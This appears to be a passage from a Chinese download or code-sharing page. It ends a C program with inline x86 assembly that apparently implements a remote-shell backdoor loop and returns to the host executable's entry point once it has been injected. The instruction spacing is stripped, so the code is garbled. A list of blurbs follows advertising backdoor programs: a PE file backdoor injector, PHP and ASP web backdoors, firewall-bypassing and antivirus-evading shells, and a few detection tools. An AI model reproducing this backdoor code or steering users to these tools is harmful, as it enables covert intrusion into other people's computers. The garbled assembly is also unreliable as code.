- leaecx,[ebp-11E8h]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- movdwordptr[ebp-12F4h],0
- loc_00401215:
- cmpdwordptr[ebp-12F4h],40h
- jnbloc_00401240
- movedx,[ebp-12F4h]
- moveax,[ebp-12F8h]
- mov[ebp+edx*4-12F0h],eax
- movecx,[ebp-12F4h]
- addecx,1
- mov[ebp-12F4h],ecx
- loc_00401240:
- xoredx,edx
- testedx,edx
- jnzloc_00401215
- leaeax,[ebp-1DCh]
- pusheax
- push0
- push0
- leaecx,[ebp-12F4h]
- pushecx
- push0
- calldwordptr[ebp-4040h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jeloc_00401338
- cmpdwordptr[ebp-11F0h],0FFFFFFFFh
- jeloc_00401338
- leaedx,[ebp-12F4h]
- pushedx
- moveax,[ebp-12F8h]
- pusheax
- calldwordptr[ebp-4034h]
- testeax,eax
- jzloc_004012B6
- push0
- push1000h
- leaecx,[ebp-11E8h]
- pushecx
- movedx,[ebp-12F8h]
- pushedx
- calldwordptr[ebp-4044h]
- mov[ebp-1E8h],eax
- loc_004012B6:
- cmpdwordptr[ebp-1E8h],0
- jaloc_004012C4
- jmploc_00401417
- loc_004012C4:
- push0
- leaeax,[ebp-1E8h]
- pusheax
- movecx,[ebp-1E8h]
- pushecx
- leaedx,[ebp-11E8h]
- pushedx
- moveax,[ebp-1E0h]
- pusheax
- calldwordptr[ebp-401Ch]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jnzloc_004012FC
- jmploc_00401415
- loc_004012FC:
- cmpdwordptr[ebp-11ECh],0
- jnzloc_0040132A
- push0
- leaecx,[ebp-1E8h]
- pushecx
- push1
- leaedx,[ebp-1340h]
- pushedx
- moveax,[ebp-1E0h]
- pusheax
- calldwordptr[ebp-401Ch]
- mov[ebp-11F0h],eax
- loc_0040132A:
- cmpdwordptr[ebp-11F0h],0
- jnzloc_00401338
- jmploc_00401413
- loc_00401338:
- push1000h
- push0
- leaecx,[ebp-11E8h]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- push0
- leaedx,[ebp-4]
- pushedx
- push0
- push0
- push0
- moveax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4020h]
- cmpdwordptr[ebp-4],0
- jbeloc_004013C3
- push0
- leaecx,[ebp-1E8h]
- pushecx
- movedx,[ebp-4]
- pushedx
- leaeax,[ebp-11E8h]
- pusheax
- movecx,[ebp-38h]
- pushecx
- calldwordptr[ebp-4024h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jnzloc_00401399
- jmploc_00401411
- loc_00401399:
- push0
- movedx,[ebp-4]
- pushedx
- leaeax,[ebp-11E8h]
- pusheax
- movecx,[ebp-12F8h]
- pushecx
- calldwordptr[ebp-4048h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jgloc_004013C3
- jmploc_0040140F
- loc_004013C3:
- jmploc_004011E8
- loc_004013C8:
- movedx,[ebp-1E0h]
- pushedx
- calldwordptr[ebp-4010h]
- moveax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4010h]
- movecx,[ebp-2Ch]
- pushecx
- calldwordptr[ebp-4010h]
- movedx,[ebp-34h]
- pushedx
- calldwordptr[ebp-4010h]
- moveax,[ebp-12F8h]
- pusheax
- calldwordptr[ebp-403Ch]
- push3E8h
- calldwordptr[ebp-4018h]
- jmploc_004010F7
- loc_0040140F:
- jmploc_004013C8
- loc_00401411:
- jmploc_004013C8
- loc_00401413:
- jmploc_004013C8
- loc_00401415:
- jmploc_004013C8
- loc_00401417:
- jmploc_004013C8
- loc_00401419:
- movesp,ebp
- popebp
- ret
- }
- /////////////////////////////////////////////////////////////
- ex:
- _asm
- {
- popecx
- pushecx
- ret
- }
- ex1:
- _asm
- {
- callex
- ret
- }
- exit1:
- ///////////////////////////////////////////////////////////////
- _asm
- {
- moveax,0x401000//这里需要更改为程序人口
- jmpeax
- }
- return0;
- }
相关推荐
该算法将无意义的冗余函数以及后门代码均匀嵌入到程序源文件中, 编译生成可执行文件载体。用隐秘信息分组替换冗余函数, 从而达到嵌入信息的目的。通过算法的具体实现, 验证了算法的可行性与有效性。与其他算法相比, ...
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
后门程序 深入分析 防范教程 ,更好的掌握和防范后门程序
程序后门制作程序后门制作程序后门制作程序后门制作
1 如何使非常规后门变成exe后门,方便我们使用,这里我们用来演示的后门程序是黑客...4 得到shell后,如何上传文件,这里我们采取在对方的shell下用ftp下载的方法实现上传后门程序。 5 连接后门以及后门的基本使用方法。
一个软件PE后门添加器,直接向PE文件写入shellcode,达到启动软前先启动后门的目的,代码值得参考
PHP实例开发源码——PhpSpy 2008 WEB后门程序
capa检测可执行文件中的功能。 您针对PE文件或Shellcode运行它,它告诉您它认为程序可以做什么。 例如,它可能表明该文件是后门程序,能够安装服务或依赖HTTP进行通信。 capa检测可执行文件中的功能。 您针对PE文件...
Metasploit可执行后门
DLL后门技术DLL后门技术,开发DLL后门的文档
EXE文件加后门源码批处理
主要介绍了Linux下查找后门程序 CentOS 查后门程序的shell脚本,需要的朋友可以参考下
一种实现隐藏型后门程序的代码,能帮助学习者掌握原理.
php简单的后门文件
一个简单的C#后门程序实例,告诉你怎样去写一个后门程序。
后门可以按照很多方式来分类,标准不同自然分类就不同,为了便于大家理解,我们从技术方面来考虑后门程序的分类方法:
介绍: 218.exe 病毒后门程序,作为后门中的佼佼者,可以突破卡巴的主动防御,他是一个反向的后门程序.
winshell是一个非常不错的后门程序,但是现在已经 有些过时了,于是我写了一个新的wxhshell,在这款后门里我采用了端口复用技术,因此可 以突破一些防火墙。其运行不影响正常端口的工作。 注意:本后门对于...
asp编写的网站后门程序,可以在线修改网站里的所有文件,可上传文件等